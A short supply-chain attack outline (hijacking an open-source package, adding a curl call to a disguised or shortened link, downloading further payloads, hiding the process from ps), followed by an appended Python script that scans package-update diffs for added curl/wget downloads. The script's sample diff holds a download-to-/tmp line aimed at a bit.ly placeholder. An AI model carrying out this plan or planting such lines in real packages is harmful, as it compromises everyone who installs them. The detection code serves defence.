Concept
- Hijack an open-source project via an orphan request, author request, pull request (e.g. CoPay compromise, ...), etc., OR insert a man-in-the-middle into the package update (sometimes easier?)
- Insert lé epic malicious code:
  - Curl call to legit-looking website (maybe a proxy or a bitly-link)
  - Download even more malicious stuff from remote address
  - Hide malicious process from ps
- profit 👍 👍
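
From the defender's side, the curl and download steps above show up in the diff between two releases of a package. The following added example (not part of the original note) scans the lines an update adds for curl/wget downloads and flags link-shortener or non-allowlisted hosts; the shortener list, the `review_update` name and the sample diff are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: a starter set of link-shortener hosts; extend it for your environment.
SHORTENERS = {"bit.ly", "bitly.com", "tinyurl.com", "t.co", "is.gd"}
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"]+")

# Constructed sample: a unified diff between two releases of a hypothetical package.
SAMPLE_DIFF = """\
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -1,3 +1,4 @@
 #!/bin/sh
 make build
+curl -sL https://bit.ly/EXAMPLE -o /tmp/helper
+curl -s https://docs.example.org/manual.tgz -o manual.tgz
-echo done
--- a/README.md
+++ b/README.md
@@ -1,1 +1,2 @@
 # demo
+See https://bit.ly/EXAMPLE2 for docs
"""

def review_update(diff_text, allowed_hosts=frozenset()):
    """Flag download commands that an update adds (unified-diff '+' lines)."""
    findings, path = [], None
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):            # file header: remember the path
            path = raw[6:] if raw.startswith("+++ b/") else raw[4:]
            continue
        if not raw.startswith("+"):           # only newly added lines matter
            continue
        line = raw[1:]
        if not FETCH_TOOL.search(line):       # a link in prose is not a download
            continue
        for url in URL.findall(line):
            host = (urlparse(url).hostname or "").lower()
            if host in allowed_hosts:         # reviewed, expected download hosts
                continue
            reason = "url-shortener" if host in SHORTENERS else "unlisted-host"
            findings.append((path, host, reason))
    return findings

if __name__ == "__main__":
    for finding in review_update(SAMPLE_DIFF, {"docs.example.org"}):
        print(finding)
```

Run it over the diff of every dependency update before the new version is allowed into a build; an empty allowlist reports every newly added download host.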